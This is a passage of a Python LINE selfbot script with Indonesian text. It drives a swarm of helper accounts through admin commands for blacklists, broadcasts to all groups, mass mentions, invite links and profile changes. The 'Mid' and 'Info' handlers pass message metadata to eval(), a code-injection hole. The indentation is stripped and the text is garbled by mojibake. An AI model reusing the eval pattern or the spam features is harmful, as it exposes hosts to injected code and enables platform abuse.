cl.sendMessage(msg.to,"ãCek ID Stickerã\nâ§STKID : " + msg.contentMetadata["STKID"] + "\nâ§STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nâ§STKVER : " + msg.contentMetadata["STKVER"]+ "\n\nãLink Stickerã" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"â§Nama : " + msg.contentMetadata["displayName"] + "\nâ§MID : " + msg.contentMetadata["mid"] + "\nâ§Status Msg : " + contact.statusMessage + "\nâ§Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
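# op.type 25/26 (sent or received message): main command dispatcher. Everything below
# runs for 1:1 chats and groups (toType 0 or 2); admin-only commands check msg._from.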
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\nãLink Stickerã" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"â§Nama : " + msg.contentMetadata["displayName"] + "\nâ§MID : " + msg.contentMetadata["mid"] + "\nâ§Status Msg : " + contact.statusMessage + "\nâ§Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ARfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["ARfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["ARfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["ARfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
ki.sendChatChecked(msg.to, msg_id)
kk.sendChatChecked(msg.to, msg_id)
kc.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
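# Text commands start here. command() is defined earlier in the script and is assumed
# to lower-case the text and strip the configured key prefix (Setmain["keyCommand"]).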
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "â§ÄFamz_Botz_FI\n"
if wait["sticker"] == True: md+="â§StickerãONã\n"
else: md+="â§StickerãOFFã\n"
if wait["contact"] == True: md+="â§ContactãONã\n"
else: md+="â§ContactãOFFã\n"
if wait["talkban"] == True: md+="â§TalkbanãONã\n"
else: md+="â§TalkbanãOFFã\n"
if wait["Mentionkick"] == True: md+="â§NotagãONã\n"
else: md+="â§NotagãOFFã\n"
if wait["detectMention"] == True: md+="â§ResponãONã\n"
else: md+="â§ResponãOFFã\n"
if wait["autoJoin"] == True: md+="â§AutojoinãONã\n"
else: md+="â§AutojoinãOFFã\n"
if wait["autoAdd"] == True: md+="â§AutoaddãONã\n"
else: md+="â§AutoaddãOFFã\n"
if msg.to in welcome: md+="â§WelcomeãONã\n"
else: md+="â§WelcomeãOFFã\n"
if wait["autoLeave"] == True: md+="â§AutoleaveãONã\n"
else: md+="â§AutoleaveãOFFã\n"
if msg.to in protectqr: md+="â§ProtecturlãONã\n"
else: md+="â§ProtecturlãOFFã\n"
if msg.to in protectjoin: md+="â§ProtectjoinãONã\n"
else: md+="â§ProtectjoinãOFFã\n"
if msg.to in protectkick: md+="â§ProtectkickãONã\n"
else: md+="â§ProtectkickãOFFã\n"
if msg.to in protectinvite: md+="â§ProtectinviteãONã\n"
else: md+="â§ProtectinviteãOFFã\n"
if msg.to in protectcancel: md+="â§ProtectcancelãONã\n"
else: md+="â§ProtectcancelãOFFã\n"
if msg.to in protectantijs: md+="â§AntijsãONã\n"
else: md+="â§AntijsãOFFã\n"
if msg.to in ghost: md+="â§GhostãONã\n"
else: md+="â§GhostãOFFã\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator âââââ¦Bardi_Ud0â§ââââº")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "ã Type Selfbot ã\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "â§Nama : "+str(mi.displayName)+"\nâ§Mid : " +key1+"\nâ§Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Xmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': JSmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
km.removeAllMessages(op.param2)
kb.removeAllMessages(op.param2)
kn.removeAllMessages(op.param2)
ko.removeAllMessages(op.param2)
kw.removeAllMessages(op.param2)
ke.removeAllMessages(op.param2)
ky.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "ãMykeyã\nSetkey bot muã " + str(Setmain["keyCommand"]) + " ã")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "ãSetkeyã\nSetkey diganti jadiã{}ã".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "ãSetkeyã\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "â§ÄPĶ Fams Grup Info\n\nâ§Nama Group : {}".format(G.name)+ "\nâ§ID Group : {}".format(G.id)+ "\nâ§Pembuat : {}".format(G.creator.displayName)+ "\nâ§Waktu Dibuat : {}".format(str(timeCreated))+ "\nâ§Jumlah Member : {}".format(str(len(G.members)))+ "\nâ§Jumlah Pending : {}".format(gPending)+ "\nâ§Group Qr : {}".format(gQr)+ "\nâ§Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += " Fams Grup Info\n"
ret_ += "\nâ§Nama Group : {}".format(G.name)
ret_ += "\nâ§ID Group : {}".format(G.id)
ret_ += "\nâ§Pembuat : {}".format(gCreator)
ret_ += "\nâ§Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\nâ§Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\nâ§Jumlah Pending : {}".format(gPending)
ret_ += "\nâ§Group Qr : {}".format(gQr)
ret_ += "\nâ§Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "â§"+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"â§Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\nãTotal %i Membersã" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
ginfo = cl.getGroup(group)
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
km.leaveGroup(group)
kb.leaveGroup(group)
kn.leaveGroup(group)
ko.leaveGroup(group)
kw.leaveGroup(group)
ke.leaveGroup(group)
ky.leaveGroup(group)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"âââ[ FRIEND LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãFriends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
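# The update*/botNup/*name commands below only arm one-shot flags (settings["groupPicture"],
# settings["changePicture"], Setmain["ARfoto"]); the actual image upload is handled by the
# contentType == 1 branches further up when the admin sends the photo.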
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["ARfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["ARfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["ARfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["ARfoto"][Dmid] = True
km.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot5up":
if msg._from in admin:
Setmain["ARfoto"][Emid] = True
kb.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot6up":
if msg._from in admin:
Setmain["ARfoto"][Fmid] = True
kn.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot7up":
if msg._from in admin:
Setmain["ARfoto"][Gmid] = True
ko.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot8up":
if msg._from in admin:
Setmain["ARfoto"][Hmid] = True
kw.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot9up":
if msg._from in admin:
Setmain["ARfoto"][Imid] = True
ke.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot10up":
if msg._from in admin:
Setmain["ARfoto"][Jmid] = True
ky.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "antijsup":
if msg._from in admin:
Setmain["ARfoto"][JSmid] = True
js.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "ghost1up":
if msg._from in admin:
Setmain["ARfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "ghost2up":
if msg._from in admin:
Setmain["ARfoto"][Xmid] = True
sx.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot4name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = km.getProfile()
profile.displayName = string
km.updateProfile(profile)
km.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot5name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kb.getProfile()
profile.displayName = string
kb.updateProfile(profile)
kb.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot6name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kn.getProfile()
profile.displayName = string
kn.updateProfile(profile)
kn.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot7name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ko.getProfile()
profile.displayName = string
ko.updateProfile(profile)
ko.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot8name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kw.getProfile()
profile.displayName = string
kw.updateProfile(profile)
kw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot9name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ke.getProfile()
profile.displayName = string
ke.updateProfile(profile)
ke.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot10name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ky.getProfile()
profile.displayName = string
ky.updateProfile(profile)
ky.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("antijsname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = js.getProfile()
profile.displayName = string
js.updateProfile(profile)
js.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("ghost1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("ghost2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sx.getProfile()
profile.displayName = string
sx.updateProfile(profile)
sx.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "sepinya" or text.lower() == 'ð':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nama = [contact.mid for contact in group.members]
# Mention every member in chunks of 20 mids per message to stay under LINE's mention limit.
for i in range(0, len(nama), 20):
mentionMembers(msg.to, nama[i:i+20])
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"Famz__botz\n\n"+ma+"\nTotalã%sã Bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"âââââ¦Daftar__Adminâ§âââ⺠\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotalã%sã Anggota" %(str(len(owner)+len(admin)+len(staff))))
